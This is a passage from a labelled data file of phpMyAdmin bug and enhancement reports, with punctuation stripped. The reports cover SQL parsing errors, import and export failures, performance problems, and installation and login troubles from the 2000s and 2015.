I m getting this error when going to the Designer page ` 1062 Duplicate entry mypmacontroluser for key PRIMARY ` <img width= 421 alt= screen shot 2015 12 07 at 15 11 45 src= https cloud.githubusercontent.com assets 28097 11633700 f881ca0c 9d0c 11e5 90a1 9901aa8fa8f9.png > The SQL that is trying to execute is INSERT INTO `phpmyadmin`.`pma designer settings` username, settings data) VALUES mypmacontroluser , { relation lines true } ); In the table settings there is already one row with that username, and the setting { snap to grid off } As the table has the username as primary key, I guess the query should try to UPDATE and add the new setting value, instead of trying to INSERT.
When I try to add settings to the pma userconfig table, it works as expected.
I m using version 4.5.2 and PHP 5.6.16","bug"
"24444","11728","CSV import skip row count after .
As brought up in http stackoverflow.com questions 34016170 mysql phpmyadmin import csv impossible , the user is trying to skip a certain number of rows when importing a CSV file because those have comments or other non CSV data.
However, there s an error because the number of columns don t match in the skipped rows).
Can we improve this so that skipped rows aren t parsed in any way?","bug"
"24444","11730","Print comments in Print view.
From http stackoverflow.com questions 34024080 phpmyadmin 4 5 x column comments no longer showing when printing table structur Since the Print view improvement of 4.5, we no longer print table column comments, but we should.","enhancement"
"24444","11731","Split up common.inc.php.
Currently common.inc.php contains quite a lot of if cases for minimal inclusion.
It should be split into two separate files, one doing the minimal set of things and second one the others on top of it.
This way we can get rid of the PMA MINIMUM COMMON define and make the code cleaner.","enhancement"
"24444","11732","exporting feature does not work with union table.
In MySQL we can create a union table like this CREATE TABLE t1 a INT NOT NULL AUTO INCREMENT PRIMARY KEY, message CHAR 20)) ENGINE=MyISAM; CREATE TABLE t2 a INT NOT NULL AUTO INCREMENT PRIMARY KEY, message CHAR 20)) ENGINE=MyISAM; INSERT INTO t1 message) VALUES Testing ), table ), t1 ); INSERT INTO t2 message) VALUES Testing ), table ), t2 ); CREATE TABLE total a INT NOT NULL AUTO INCREMENT, message CHAR 20), INDEX a)) ENGINE=MERGE UNION= t1,t2) INSERT METHOD=LAST; When I try to export data from main table total in PHPMyAdmin, select the csv format, it will always result into nothing.
But if I try to export data from sub tables t1 or t2 in PHPMyAdmin, also select csv format, it will work fine.
PHPMyAdmin version 4.4.7","bug"
"24444","11734","No result shown, if writing statement, comment, single select.
I m using 4.4.12 This query WON T show the result of the SELECT query CREATE TEMPORARY TABLE test id int); SELECT 1; But this query WILL show the result of both SELECTs CREATE TEMPORARY TABLE test id int); SELECT 1; SELECT 2; <img width= 628 alt= bildschirmfoto 2015 12 09 um 14 09 25 src= https cloud.githubusercontent.com assets 381873 11686114 a9f46516 9e7e 11e5 8edb 893021ce7bb6.png > <img width= 599 alt= bildschirmfoto 2015 12 09 um 14 09 04 src= https cloud.githubusercontent.com assets 381873 11686115 a9f9fdf0 9e7e 11e5 8f9e d89b743b563a.png >","bug"
"24444","11735","Row deletion and editing links fail to execute respective query.
Hi.
Table rows I inserted in database I created are unresponsive to clicks to change their values or delete rows !
[xcsaq] https cloud.githubusercontent.com assets 11933624 11698250 49634f28 9e83 11e5 98f9 7b148f3e3484.png) !
[yrsox] https cloud.githubusercontent.com assets 11933624 11698256 505766ac 9e83 11e5 95d1 59d900add68c.png) SELECT FROM Database.Table WHERE ; DELETE FROM TABLE WHERE LIMIT 1; Of course I have an error in My SQL syntax; There s no need to check the manual that corresponds to my MariaDB server version for the right syntax to use near at line 1, since I know reference id=someNumber) is needed, But I thougt it should be added automatically.
Should I configure something else in adittion to what I ve already configured?
All my Tables have their primary and unique keys.
Issue only happens with a table like this.
Other databases show no problem bringing their rows for editing or even deleting them when I click their edit and delete links.
Writing commands in consoles is no problem textbox is marking invalid syntax for valid syntax, but commands still run).
Since tools provided with currently X.A.M.P.P.
most recent version 5.6.14) for Windows are outdated P.H.P.
5.6.14) and messy with some tools included P.H.P.MyAdmin 4.4.14, MariaDB 10.0.17).
I updated them 5.6.16, 4.5.2, 10.1.19) by just downloading, replacing and rewriting their .ini s with the options usually mandatory and obviously demanding.
Tried new database with a single table of the ones I have Here is the export CREATE TABLE Categoria id bigint 20) NOT NULL, orden bigint 20) NOT NULL, activa tinyint 4) DEFAULT 1, nombre varchar 256) NOT NULL, detalle varchar 512) NOT NULL, PRIMARY KEY id), UNIQUE KEY nombre nombre), UNIQUE KEY orden orden) )ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO Categoria id,orden,activa,nombre,detalle) VALUES 1, 1, 1, COBRE , Rradiadores, estaxc3xb1ados y otros.
), 2, 2, 1, BRONCE , rebaba, radiadores etc..
Se incluye al antimonio ), 3, 3, 1, ALUMINIO , Rebaba, rines, perfiles, cables, botes, radiadores, litografxc3xadas, aleaciones, etc.
); Problem persists.
Maybe adding two unique keys confuses phpmyadmin.
So, if you know I missed something, please let me know...","bug"
"24444","11736","Ran into fatal javaScript error when try to use visual builder for Query PhpMyAdmin.
Environment PHP ver 5.6.13 MySQL server ver 10.0.21. phpMyAdmin ver 4.5.0.2. wembin version 1.760 OS Fedora Linux 22 64 bit).
KDE Platform ver 4.14.14 Issue scenario 1.
Created databases and tables.
2.
Select tab Query 3.
Upon selection I saw a option Switch to visual builder 4.
Double click on Switch to visual builder I got error message, A fatal JavaScript error has occurred.
Would you like to send an error report?
please see attached screenshot)","bug"
"24444","11737","Latest version unusably slow maxes out MySQL OS X).
Mac OS X 10.9.5 MySQL 5.6.10 PHP v5.6.16 I upgraded to v4.5.2 from v4.4.12 and the performance of th new version makes it unusable clicking on a database name to get a list of tables around 146 tables in the database) takes several minutes to load each time and MySQL daemon maxes out 97 CPU during this period.
Reverting back to the old version and the same operation completes in seconds.
Please investigate this issue.
Thanks Rich","bug"
"24444","11739","Export not working with table aliases.
Description If I execute a query using table aliases and I click on the Export link under the result I get to the Export tab.
But there no export settings are shown.
When clicking on Go the result is shown again.
After replacing the table aliases the export works fine.
phpMyAdmin version 4.5.2 Quey with which the error occurs SELECT a.customer id, a.user, r.pw FROM user AS a INNER JOIN user mn AS c ON a.id = c.id INNER JOIN password mn AS r ON c.id = r.id WHERE a.active = J AND r.active = J","bug"
"24444","11740","DELETE ...
USING.
In 4.5.2, cf http dev.mysql.com doc refman 5.7 en delete.html .
Unrecognized keywork near USING","bug"
"24444","11741","Execute statement only returns result count.
I see two related reports on Stackoverflow about phpMyAdmin not properly handling results from a prepared statement instead of the results, we give a count of results).
http stackoverflow.com questions 29240965 phpmyadmin execute stmt only returns rows http stackoverflow.com questions 34201964 no results in phpmyadmin For a sample statement, we can see http dev.mysql.com doc refman 5.7 en sql syntax prepared statements.html <pre> mysql> PREPARE stmt1 FROM SELECT SQRT POW ?,2) POW ?,2)) AS hypotenuse ; mysql> SET a = 3; mysql> SET b = 4; mysql> EXECUTE stmt1 USING a, b; | hypotenuse | | 5 | mysql> DEALLOCATE PREPARE stmt1; < pre>","bug"
"24444","11742","MATCH AGAINST keywords not recognized.
As reported at http stackoverflow.com questions 34194226 syntax error on completely correct sql syntax It appears as if we do not recognize the syntax of the MATCH ) AGAINST ) keywords functions in the SQL tab.","bug"
"24444","11743","phpMyAdmin does not support granting execute permissions on specific stored procedures.
It looks like the most restrictive permission I can assign towards executing a subset of my stored procedures is at the database level, i.e.
granting execute on all stored procedures in the database, instead of specific ones.
Opening issue because I intend to try to fix and close it myself but wanted to document it first, but if someone else has time to do it sooner then that s fine too.
Steps to reproduce issue 1 In mysql command line interface CLI) logged in as root .
2 Observe via mysql CLI that permissions were granted .
3 Observe actual execution of stored procedure logged in as testuser .
4 Observe in phpmyadmin, database TestDatabase, Privileges tab that testuser localhost is not shown at all.
Verify the string Users having access to TestDatabase is present.
Cleanup as root .","bug"
"24444","11744","Incomplete results of UNION ALL.
Based on http stackoverflow.com questions 34247531 what is phpmyadmin doing to my union all query .
.
This returns 3 lines in mysql CLI and 1 line in phpMyAdmin 4.5.2 and current QA 4 5.","bug"
"24444","11747","Undefined index controllink.
Is this harmful?
Appears when logging in.. Notice in .\libraries\relation.lib.php 445 Undefined index controllink Thanks...
I m using version 4.4.9 Php version 5.6.14 !
[screen shot 2015 12 15 at 3 26 39 am] https cloud.githubusercontent.com assets 5993217 11791411 e8ff8a86 a2db 11e5 92e9 09fb6a4fe07d.png)","bug"
"24444","11749","Undefined variable pack keys, row format.
hello, i am getting this error while playing with some table.
<pre> Notice in .
tbl operations.php 160 Undefined variable pack keys Notice in .
tbl operations.php 165 Undefined variable row format Notice in .
tbl operations.php 339 Undefined variable pack keys < pre> i think it could be solved cos these variables defined as default first on line 63); <pre> define some variables here, for improved syntax in the conditionals is myisam or aria = is isam = is innodb = is berkeleydb = false; < pre> cos i used this myself i problem is resolved; <pre> tmp undefined variables error pack keys = row format = null; < pre>","bug"
"24444","1803","Migrate issues from sourceforge.
We need to migrate existing issues from sourceforge.net Current blockers [x] Get fresh dump of sourceforge.net trackers.
Currently we have one week old one.
[x] The import fails for 4 issues, due to using of some unicode chars 4 byte utf 8), should be fixed in GitHub API.
The code for migration is here https github.com nijel sf2gh","bug"
"24444","1804","DOM drags us down.
Pages scroll super slow with large db table schemas.
I m thinking this relates to having tons of DOM entities.
I m just asking if this can be improved.
I m thinking the issue is shipping too many form inputs and sometimes we don.
t even intent to use them so is it possible to create them on the fly or does it already do that?","enhancement"
"24444","1808","Improve table structure generates invalid SQL.
In phpMyAdmin 4.4.12, splitting a column into two in Step 1.1 of Improve table structure , generates an invalid SQL query like this .
There is no column name indicating where the first column should be inserted.
Clicking Cancel and selecting another tab triggers a series of error messages about several undefined indexes in \libraries\create addfield.lib.php submitted).","bug"
"24444","1812","problem after auto hint when using an alias for my table.. My purpose is to Input tab2.invitation code !
[1] https cloud.githubusercontent.com assets 13072977 8842389 1b348410 312c 11e5 8b67 1dab443cb6ad.PNG) First, input tab2.i .
Then choose invitation code .
!
[2] https cloud.githubusercontent.com assets 13072977 8842391 23e90bb2 312c 11e5 8787 0e7c5097ed92.png) Then, press Enter .
!
[3] https cloud.githubusercontent.com assets 13072977 8842394 282896f2 312c 11e5 8d39 4204498e1e65.png) Now you see it automatically become member.invitation code , instead of my expected tab2.invitation code .","bug"
"24444","1813","Delete rows using Check All is broken.
Hello, I am using the latest PMA 4.4.12.
Today I lost the whole content of a table, because the Check All button is broken if you want to deselect some of the entries.
Steps to reproduce Create a simple table and add some rows to it.
Browse the table and click Check All .
Deselect some entries.
Click Delete .
Result All rows will be deleted, even the deselected ones.
This is a very serious bug.
I consider it as critical.
Best regards Michael !
[pma step1] https cloud.githubusercontent.com assets 6604906 8847482 40c79a82 3159 11e5 8f9f d3807b2e6e27.jpg) !
[pma step2] https cloud.githubusercontent.com assets 6604906 8847479 40be2088 3159 11e5 9ec3 76b7e82c8664.jpg) !
[pma step3] https cloud.githubusercontent.com assets 6604906 8847481 40be35fa 3159 11e5 99ea 629f95f03413.jpg)","bug"
"24444","1817","Creating configuration storage tables fail in MySQL 5.7.
The default SQL mode in MySQL 5.7 includes `STRICT TRANS TABLES` [1] and from MySQL 5.7.4 though 5.7.7 `STRICT TRANS TABLES` has the effect of `NO ZERO DATE` [2].
`NO ZERO DATE` disallow special zero value 0000 00 00 00 00 00) for timestamp columns and `CREATE TABLE` statements in create tables.sql which include `timevalue timestamp NOT NULL` fails.
Even though this behavior has been reverted in 5.7.7, according to documentation The long term plan is still to have the three affected modes be included in strict SQL mode and to remove them as explicit modes in a future MySQL release .
[1] http dev.mysql.com doc refman 5.7 en sql mode.html sql mode important [2] http dev.mysql.com doc refman 5.7 en sql mode.html sql mode changes","enhancement"
"24444","1818","Running SQL query.
I m trying to run SQL queries in phpmyadmin, and no matter what I type, I always get this error message.
Error SQL query Content Type application octet stream MySQL said You have an error in your SQL syntax near Content Type application octet stream at line 1 Please help.
Thanks, Kyle kyle webxd.com Original URL https sourceforge.net p phpmyadmin support requests 1 https sourceforge.net p phpmyadmin support requests 1 Original author anonymous","bug"
"24444","1819","Using ereg instead of preg.
By using amp;quot;ereg amp;quot; instead of amp;quot;preg amp;quot; functions you can support PHP 3.0.7.
In fact amp;quot;preg amp;quot; functions aren t supported until PHP 3.0.9 so the requirements need to be updated.
Original URL https sourceforge.net p phpmyadmin support requests 2 https sourceforge.net p phpmyadmin support requests 2 Original author bradandersen","bug"
"24444","1820","Send SQL Query to text file.
Only TABLE can send to file, but sql query in the sql form of TABLE can t send to file or there isn t have any send method from user s sql query.
Original URL https sourceforge.net p phpmyadmin support requests 3 https sourceforge.net p phpmyadmin support requests 3 Original author platinum pt","bug"
"24444","1821","Setting up Advanced Authentication.
Whenever I enable Advanced Authentication, I get an internal server error 500) and it wont work.
I have the user name and password set for the advanced authentication, but it just doenst work.
It works on my old version of PHPMyAdmin 2.1.?)
but not on this one.
Anyone else have this problem Original URL https sourceforge.net p phpmyadmin support requests 4 https sourceforge.net p phpmyadmin support requests 4 Original author bend963","bug"
"24444","1822","Hmmm Pleas tell what new Funktions ther.. What new things is ther in phpMyAdmin 2.2.1rc1 ???
I wana know that Please Original URL https sourceforge.net p phpmyadmin support requests 5 https sourceforge.net p phpmyadmin support requests 5 Original author anonymous","bug"
"24444","1823","sign unable to insert.
Hello, IS this a MYSQL issue or a phpMyAdmin ?
We cannot run an insert of a plus sign into a varchar field.
CREATE TABLE test ID int 11) NOT NULL auto increment, TEST varchar 50) NOT NULL default , PRIMARY KEY ID), KEY ID ID) ) TYPE=MyISAM; Dumping data for table `test` INSERT INTO test VALUES 1, test test ); but if I edit and add a sign in the interface it is a no go but I can via straight SQL update test set test = test test where ID =1 Original URL https sourceforge.net p phpmyadmin support requests 6 https sourceforge.net p phpmyadmin support requests 6 Original author apocryia","bug"
"24444","1824","Error in phpMyAdmin.
Warning Cannot add more header information the header was already sent header information may be added only before any output is generated from the script check for text or whitespace outside PHP tags, or calls to functions that output text) in .
db details.php3 on line 37 I get this error when loggin in to query the database.
Not sure what this means, any insight would be helpful.
Thanks again Original URL https sourceforge.net p phpmyadmin support requests 7 https sourceforge.net p phpmyadmin support requests 7 Original author anonymous","bug"
"24444","1825","MySQL extension.
Hi everebody, while i am trying to start PHPmyAdmin 2.2.0, it writes this error cannot load MySQL extension, please check PHP configuration instead of normal function.
It makes this error on all versions of PHPmyAdmin, but only on some computers.
I tried it on 3 computers amp;gt; on one it works properly, on other two it writes the error i described.
I mean, it is not a PHPmyAdmin bug, it is probably error of settings the system enviroment on which it run Linux RedHat 7.1), but i dont know, what change to makes it all right.
Can me anybody help with ?
What shell i do?
Thans in advance Viktor Original URL https sourceforge.net p phpmyadmin support requests 8 https sourceforge.net p phpmyadmin support requests 8 Original author anonymous","bug"
"24444","1826","Doesn t Process Query.
We re having problems with PHP My Admin processing queries and inserting text files into tables.
When trying to insert a text file into a table, I select the table, I go to ldi table.php3 from the main phpMyAdmin control area, then I enter my criteria and upload.
Upon pushing upload, it returns to the exact same ldi table.php3 screen and does not insert the data or give me an error.
I have run the same command on other versions of phpMyAdmin and it goes through fine.
Here s what I m running Welcome to phpMyAdmin 2.2.0 MySQL 3.23.41 nt running on localhost Please advise.
Original URL https sourceforge.net p phpmyadmin support requests 9 https sourceforge.net p phpmyadmin support requests 9 Original author anonymous","bug"
"24444","1827","Problems with alter Database Entrys.
Is it possible to use only the primay index if exists) when i want to delete or edit a database entry?
I had some trouble with a few database entrys which are to long fields with longtext.
I cant t alter or delete it.
I is a problem with the url to long) because phpMyAdmin uses all fields for the query!?!
Original URL https sourceforge.net p phpmyadmin support requests 10 https sourceforge.net p phpmyadmin support requests 10 Original author anonymous","bug"
"24444","1828","SQL query error on phpMyAdmin.
When I want to run a SQL query on my database for example mysql) in the textarea form for example SELECT FROM user ;), I ve got the following answer Your SQL Query has been executed successfully No tables found in database Have you got an explaination ?
Thank You.
Bob Original URL https sourceforge.net p phpmyadmin support requests 11 https sourceforge.net p phpmyadmin support requests 11 Original author anonymous","bug"
"24444","1829","very SLOW.
It s something wrong with my MySQL??
PHPMyAdmins works, I can see interact with data from MySQL... if I am VERY PATIENT.
Sometimes a timeout occurs before completing what it s doing.
APACHE PHP MYSQL are running on NT4.0; no INTERNET involved.
Please can you give me a hint what is wrong?
Thanx, Alex Original URL https sourceforge.net p phpmyadmin support requests 12 https sourceforge.net p phpmyadmin support requests 12 Original author anonymous","bug"
"24444","1830","PostgreSQL compatable.
Will any of the future version of phpMyAdmin be compatible with PostgreSQL?
I am familiar with the project amp;quot;http sourceforge.net projects phppgadmin amp;quot;, however, it seems that phpMyAdmin has a more active development team and more features.
Let me know. )
Thanks, Timothy Original URL https sourceforge.net p phpmyadmin support requests 13 https sourceforge.net p phpmyadmin support requests 13 Original author anonymous","bug"
"24444","1831","No Create Database Button.
There is no create database button I am running phpMyAdmin 2.2.2 on 2 different Cobalt RAQ3 Servers, using apache 1.3.06 and PHP 4.0.6 and apache 1.3.20 and PHP 4.1.0 respectively.
I have edited config.php to include the correct url and advance auth as folows cfgPmaAbsoluteUri = http www.mdomain sql phpmyadmin ; cfgServers[1][ host ] = localhost ; cfgServers[1][ port ] = ; cfgServers[1][ socket ] = ; cfgServers[1][ connect type ] = socket ; cfgServers[1][ stduser ] = mysql ; cfgServers[1][ stdpass ] = ; cfgServers[1][ adv auth ] = TRUE ; cfgServers[1][ user ] = root ; cfgServers[1][ password ] = ; cfgServers[1][ only db ] = ; cfgServers[1][ verbose ] = ; cfgServers[1][ bookmarkdb ] = ; cfgServers[1][ bookmarktable ] = ; When I call up http www.mdomain sql phpmyadmin and login as root I get Welcome to phpMyAdmin 2.2.2 MySQL 3.23.44 running on localhost as root localhost MySQL Show MySQL runtime information [Documentation] Show MySQL system variables [Documentation] Users [Documentation] Databases statistics Log out ) In the left frame I get Home \ mysql 6) \ test 1) Priviledges for ROOT are as follows Select Insert Update Delete Create Drop Reload Shutdown Process File Grant References Index Alter If I try and run Http www.mdomain sql phpmyadmin db create.php?
lang=en amp;amp;server=1 I get the following error Error SQL query CREATE DATABASE MySQL said You have an error in your SQL syntax near at line 1 Please can you tell me what I am doing wrong ?
and why I can not get a create database button ?
I have seen several people ask this same question and can find no replies or solutions.
Many thanks Steve Bassi Original URL https sourceforge.net p phpmyadmin support requests 14 https sourceforge.net p phpmyadmin support requests 14 Original author stevebassi","bug"
"24444","1832","Move binary data from one db to another?.
Hi!
I am storing images in my MySQL database.
I have tried to make a amp;quot;dump amp;quot; of my database, and to move it to my local computer.
But when I run the SQL file containing binary data images), I get an error in my SQL query.
Probably because the binary data gets translated into ASCII.
I guess some of the binary data makes an amp;quot; amp;quot; or an amp;quot; amp;quot; amp;quot;, and that makes the query to fail.
Does anybody know how to overcome this problem?
How can I move copy a database containing binary data from one computer to another?
I think I can use the MySQL ODBC Driver, but I d like to copy move the db with phpMyAdmin) Thanks!!
Torbjxc5x99rn PS Thanks for making phpMyAdmin openSource!!!
Original URL https sourceforge.net p phpmyadmin support requests 15 https sourceforge.net p phpmyadmin support requests 15 Original author anonymous","bug"
"24444","1833","csv export to file has 2 line breaks.
When I export to Excel CSV with Explorer it works great.
But with Netscape 4.7, windows) there are double line breaks and so every other entry is blank.
Any ideas about what it going on and what a good fix would be?
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 16 https sourceforge.net p phpmyadmin support requests 16 Original author anonymous","bug"
"24444","1834","Table creation.
When i try to create a table with the following name amp;quot;Test amp;quot;, I will get always amp;quot;test amp;quot;.
Bug or configuration problem ?
Thanks in advance Original URL https sourceforge.net p phpmyadmin support requests 17 https sourceforge.net p phpmyadmin support requests 17 Original author anonymous","bug"
"24444","1835","How do I ALTER TABLE?.
Is it possible to add a column to an existing table with phpMyAdmin?
I am reading all the documentation and cant find how to do it from the web interface.
I am running Welcome to phpMyAdmin 2.2.3 MySQL 3.23.43 Thanks much Original URL https sourceforge.net p phpmyadmin support requests 18 https sourceforge.net p phpmyadmin support requests 18 Original author bmikovits","bug"
"24444","1836","Alias problem with text fields.
I have a test table in db sl called test with two fields comp type int) and tval type text).
There are 7 records with values 1 7 for comp and NULL values for text at present).
The following queries work select comp,tval from test; select t.comp from test as t; however select t.comp,t.tval from test as t; returns an error with phpMyAdmin2.2.0 namely SHOW FIELDS FROM `sl`.`t` LIKE `tval` MySQL said Table `sl`.`t` eoesn t exist However If I change the field type of tval to VARCHAR 100) then it does work as expected.
Using the TEXT field type seems to upset things.
Is this a bug?
Is there a work around other than not using aliases).
In the real app there are quite a few fields and it would be very tedious not to be able to use them.
PS using MyODBC with FileMaker Pro also gives an error.
However it works if you type in at the command line in MySQL.
Original URL https sourceforge.net p phpmyadmin support requests 19 https sourceforge.net p phpmyadmin support requests 19 Original author rbnewman","bug"
"24444","1837","I cant add new users.
I have installed the newest Apache, PHP4, mySQL and phpMyAdmin.
Both the webserver and PHP are working fine.
I go to the phpMyAdmin login page, put in my username and password I have full access).
I go to the users page, and select amp;quot;Any host amp;quot; and keep its box blank.
I then type in a new username and password twice) and select some privileges normaly Select, Insert, Update, Delete, Create and Drop.)
I click amp;quot;go amp;quot; and it confirms the user was created.
I then logout ang go to the login screen.
I or anyone else) then try to login with the new username and password and click submit.
It then just sends me back to the login page like I did something wrong.
I am using cookies to login which are enabled).
My phpinfo page is here http www.dwz.dns2go.com phpmyadmin phpinfo.php I have attached my config file removing all passwords first).
Original URL https sourceforge.net p phpmyadmin support requests 20 https sourceforge.net p phpmyadmin support requests 20 Original author miadwz","bug"
"24444","1838","link between php and mysql.
on a new cobalt) server installation, phpMyAdmin 2.2 runs silky smooth, shows and manipulates mysql tables as expected.
a simple php page using the mysql connect ) function, however, brings up an error message Fatal error Call to undefined function mysql connect ) in home sites site24 web admin db.inc on line XY .
this hints at a missing module in the php installation.
how come phpMyAdmin works nevertheless?
is phpMyAdmin using a different way to connect to the mysql host than mysql connect )?
Original URL https sourceforge.net p phpmyadmin support requests 21 https sourceforge.net p phpmyadmin support requests 21 Original author anonymous","bug"
"24444","1839","View a Constraint.
In wich way is possible to view foreign keys in phpmyadmin ?
If I create a foreign key and next generate a database script dump), I don t see the FK Tank you Original URL https sourceforge.net p phpmyadmin support requests 22 https sourceforge.net p phpmyadmin support requests 22 Original author anonymous","bug"
"24444","1840","2.2.4 rc1 cannot find page in IE6 login.
Hello, I have the following configuration Linux Red Hat 6.2, Mysql 3.23.37, PHP4.04.
Client WinMe Internet Explorer 6.02 and Netscape 6.2. phpMyAdmin 2.2.4 rc1 Internet Explorer can not login 404 page can t be found.
Netscape works perfect.
2.2.3 IE and Netscape can not update table.
2.2.2 IE works OK. Netscape has numerous problems Original URL https sourceforge.net p phpmyadmin support requests 23 https sourceforge.net p phpmyadmin support requests 23 Original author anonymous","bug"
"24444","1841","Error Message from MySQL.
I am using an e smith server Mitel SME 5) and have installed phpMyAdmin from RPM s downloaded from Mitel.
When I try to access phpMyAdmin I receive the following error message from MySQL Error MySQL said MySQL Connection Failed Access denied for user root cs6669119 68.satx.rr.com Using password YES) To get phpMyAdmin to work I must kill the mysqld process and issue the command to run MySQL in safe mode as follows mysqladmin skip grant tables amp;amp; After this I am able to run phpMyAdmin until the mysqld is restarted or the pc is rebooted.
I have attempted several things to remedy this to no avail.
Any help you can give me would be appreciated.
Thanks, Jeff Flora Original URL https sourceforge.net p phpmyadmin support requests 24 https sourceforge.net p phpmyadmin support requests 24 Original author anonymous","bug"
"24444","1842","import?.
i want to import this CREATE TABLE xoops cwe class range low int 4) NOT NULL default 0 , high int 4) NOT NULL default 0 ) TYPE=MyISAM COMMENT= THIS TABLE SHOULD NEVER HAVE MORE THAN ONE ROW!!!!!!!!!!!!!!
; CREATE TABLE xoops cwe event signups eventid int 4) NOT NULL default 0 , uid int 11) unsigned NOT NULL default 0 ) TYPE=MyISAM COMMENT= Links users to events aka being signed up) ; CREATE TABLE xoops cwe events eventid int 4) NOT NULL auto increment, name varchar 80) NOT NULL default , date date NOT NULL default 0000 00 00 , time varchar 20) NOT NULL default , location varchar 255) NOT NULL default , description text NOT NULL, materials varchar 255) NOT NULL default , mapurl text, slots1 int 2) NOT NULL default 0 , slots2 int 2) NOT NULL default 0 , slots3 int 2) NOT NULL default 0 , slots4 int 2) NOT NULL default 0 , addedby int 11) unsigned NOT NULL default 0 , notifysignups char 1) binary NOT NULL default , PRIMARY KEY eventid) ) TYPE=MyISAM COMMENT= Community Wellness Events ; But i don t know what to fill in where.
Is there a program script that does this for me?
ps.
the database is on a remote host NOT on my own pc.
awnsers please to vjspeedy wish.net Original URL https sourceforge.net p phpmyadmin support requests 25 https sourceforge.net p phpmyadmin support requests 25 Original author anonymous","bug"
"24444","1843","blank page, no error messages.
Hallo, I tried different versions of 2.2 but every shows my only a blank page.
Netscape says document contents no data ).
Also auth methods.
But nothing work.
Perhaps no problem in phpMyAdmin, but maybe you know the resolution.
Last version with an index.php3 worked fine, but the new not at all tried your php3 and php4 versions).
Greetings Andreas.
Original URL https sourceforge.net p phpmyadmin support requests 26 https sourceforge.net p phpmyadmin support requests 26 Original author kansok","bug"
"24444","1844","2.2.3) Pages not found.
Apache 1.3.23 win32) MySQL 3.23.47 php 4.1.0 I faced a few bugs while testing translating 2.2.3 version, like amp;gt; insert row amp;gt; insert as new row and) insert a new record or amp;gt; create new table amp;gt; save without data input amp;gt; hit amp;quot;Back amp;quot; both display The page cannot be found Everything else works just fine, i think! )
Just one more thing amp;quot;Select All amp;quot; does not work when there s just one field to select why not?)
Original URL https sourceforge.net p phpmyadmin support requests 27 https sourceforge.net p phpmyadmin support requests 27 Original author loisv","bug"
"24444","1845","Neue Zeile enfxc3xbcgen nach ganz oben.
Wenn die Datenbank ausgewxc3xa4hlt und die Tabelle angezeigt wird.
So findet man ganz unten amp;quot;Neue Zeile enfxc3xbcgen amp;quot;.
Warum wird diese Zeile nicht ganz oben mit angezeigt ?
Original URL https sourceforge.net p phpmyadmin support requests 28 https sourceforge.net p phpmyadmin support requests 28 Original author anonymous","bug"
"24444","1846","Truncated dump file.
I ve got a truncated dump file when I want do dump all database.
This occurs with 2.2.4 release and 2.2.5 from cvs).
There is very important to me, because I haven t any other tool to acces remote db.
Original URL https sourceforge.net p phpmyadmin support requests 29 https sourceforge.net p phpmyadmin support requests 29 Original author mizydors","bug"
"24444","1847","how to enable login authentication?.
Hi, I just install this phpMyAdmin 2.2.4 version.
I am wondering, how can I enable the login authentication require when teh user go to page?
Now, everytime the user can straight away view the whole MySQL server, without any login authentication.
THanks Louis Original URL https sourceforge.net p phpmyadmin support requests 30 https sourceforge.net p phpmyadmin support requests 30 Original author anonymous","bug"
"24444","1848","PHP 4.1.2 and phpMyAdmin 2.2.4.
The index.php shows amp;quot;MySQL 3.23.37 running on localhost as admin localhost amp;quot; in the first page and it has one database shown!!
I don t have admin user in the database so I have no clue how is the above happening!
I just upgraded to php 4.1.2 a half an hour ago and this is how things started so please let me know if there is a solution.
Original URL https sourceforge.net p phpmyadmin support requests 31 https sourceforge.net p phpmyadmin support requests 31 Original author anonymous","bug"
"24444","1849","Logout doubt).
I ve just uploaded phpPMA to some server and I ve chosen amp;quot;http Authentication method amp;quot;.
When I click lougout there s this window poping repeatedly asking for new user password until the 3rd time, when it finally redirects to index.php displaying amp;quot;Welcome to phpMyAdmin 2.2.3 Wrong username password.
Access denied.
amp;quot; Shouldn t it redirect to some logoutwhatever.inc.php the first time I click logout , or is it just as it is??!
Original URL https sourceforge.net p phpmyadmin support requests 32 https sourceforge.net p phpmyadmin support requests 32 Original author loisv","bug"
"24444","1850","no databases in the left frame.
phpmyadmin connects to mysql but it s not showing any databases in the left frame.
I m sure there are because other web application sees them.
Even when I create a new db from phpmyadmin it doesn t display it.
Ideas?
Original URL https sourceforge.net p phpmyadmin support requests 33 https sourceforge.net p phpmyadmin support requests 33 Original author anonymous","bug"
"24444","1851","Warning Unable to jump to row 0 on MySQ.
Hello, Is this a common message?
Warning Unable to jump to row 0 on MySQL result index 2 in .
libraries common.lib.php on line 544 Is there a simple solution?
I can get to the MySQL server through mysql, I ve created a database, one table, and have populated one row, so I know that MySQL is working?
Any help appreciated, Ian Original URL https sourceforge.net p phpmyadmin support requests 34 https sourceforge.net p phpmyadmin support requests 34 Original author anonymous","bug"
"24444","1852","User Grants... totally screwed up.. try it out, i don t know what else to tell you..
Original URL https sourceforge.net p phpmyadmin support requests 35 https sourceforge.net p phpmyadmin support requests 35 Original author anonymous","bug"
"24444","1853","Crashes my browser IE6).
phpmyadmin version 2.2.4 and later mysql version 2.23.38 php version 4.0.6 ie version 6.0.2600.0000 os win98se it crashes my browser IE6) when i try to edit, delete and grants privileges to the newly created user.
i don t know if it is a bug in the browser or phpmyadmin.
mozilla 0.9.9 and netscape 4.77 is working fine.
Original URL https sourceforge.net p phpmyadmin support requests 36 https sourceforge.net p phpmyadmin support requests 36 Original author anonymous","bug"
"24444","1854","2.2.5) stats.
i just download new phpmyadmin 2.2.5 release and when i click database statistics i get this..
Database Table s) Data Indexes Total Warning Supplied argument is not a valid MySQL result resource in usr local apache htdocs phpMyAdmin db stats.php on line 219 Warning Supplied argument is not a valid MySQL result resource in usr local apache htdocs phpMyAdmin db stats.php on line 241 Warning Supplied argument is not a valid MySQL result resource in usr local apache htdocs phpMyAdmin db stats.php on line 219 Warning Supplied argument is not a valid MySQL result resource in usr local apache htdocs phpMyAdmin db stats.php on line 241 Original URL https sourceforge.net p phpmyadmin support requests 37 https sourceforge.net p phpmyadmin support requests 37 Original author a1exus","bug"
"24444","1855","Setting Up Problem.
I guess you might not help a newbie to PhpAdmin, but I ll give it a shot.
I ve just uploaded phpmyadmin to my server and believe I ve edited the config.inc.php properly.
I put all the files on my Linux ISP s server in a sub directory call Msqladmin.
My home page is www.lifechangingchurch.org I get this after typing http www.lifechangingchurch.org Mysqladmin index.php Fatal error Failed opening required .
libraries grab globals.lib.php include path= .
usr local lib php ) in usr home lifechanging public html Mysqladmin index.
php on line 8 I ve got 777 on the subdirectory.
I don t know where these libraries are.
